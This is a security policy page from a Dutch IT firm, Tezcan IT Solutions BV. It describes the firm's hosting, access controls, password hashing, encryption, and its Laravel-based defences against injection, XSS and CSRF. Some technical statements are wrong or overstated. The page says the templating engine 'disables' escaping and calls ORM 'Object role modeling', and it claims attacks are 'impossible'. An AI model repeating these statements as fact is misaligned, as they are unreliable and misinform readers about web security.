Security policy

Anti-virus & Anti-malware

The computers & servers at Tezcan IT Solutions BV are regularly checked for viruses and malware. The most up-to-date databases are always used for this purpose.

 

Sensitive information

Customer data is stored on production servers and is only accessible to employees of Tezcan IT Solutions BV who are authorized to do so. Backups are stored on a restricted server, only accessible from certain IP ranges.

Where necessary (or in accordance with the client's wishes) sensitive data is stored with encryption.

Customers can submit a request for the removal of their data. Sensitive hard copy data will be shredded.

 

Data access

Only employees of Tezcan IT Solutions BV who work on a product have access to it. When their contract is terminated, they lose their access.

 

Used techniques

Different techniques are applied, but most of them are based on Laravel and MySQL. All security updates are performed accordingly if this is included in the SLA. If not, it is always possible to implement updates at an hourly rate.

 

Hosting provider

Tezcan IT Solutions BV makes use of two suppliers of servers:

 

Strato: this is what the VarenykyCMS system runs on. Strato's datacenters are ISO 27001 certified and are located in Germany.

Transip: All other services. Transip's data centres are ISO 27001, NEN 7510 and ISO 9001 certified and are located in the Netherlands.

 

Secure connection: HTTPS

Tezcan IT Solutions BV uses an SSL certificate to ensure a secure connection between the server and the user. If so desired and at a surcharge, it is possible to use a certificate with extended validation (recognizable by the green address bar).

 

SSH access: Private keys

Tezcan IT Solutions BV only uses private keys for access to the production environments. Only employees that require a private key with access will be granted access.

 

Password Hashing: Bcrypt with a unique salt

All user passwords are hashed "one-way". This makes it impossible to decrypt the passwords. Passwords are never saved as plain-text.

 

Encryption of Sensitive Data: AES-256-CBC

Where necessary (or in accordance with the client's wishes) sensitive data is stored using AES encryption (AES-256-CBC cipher) with an encryption key. This key is generated on the production server and stored in a file, this key is never uploaded in git version control.

 

SQL injection

To prevent SQL injections, an ORM (Object role modeling) is used which only allows parameterized queries. This makes it impossible to use malicious input in queries.

 

XSS protection

To combat XSS attacks, a templating engine is employed. This automatically disables variable escaping.

 

CSRF token protection

A CSRF token is created automatically with every request. Each POST/PUT/DELETE request validates the CSRF token sent with it. Because of this it is impossible to make a request from another website.

 

Authentication

Authentication is an automatic feature within Laravel, which complies with the security policy as described on this page. It also contains a mechanism to limit certain routes on certain user levels.

 

Validation

Laravel contains a comprehensive validation mechanism. For example, it is capable of checking files for file type, and to see if a certain email address is already in use.

 

GIT version control and backups

The application is stored in a git repository. This repository will not contain sensitive information and/or database passwords.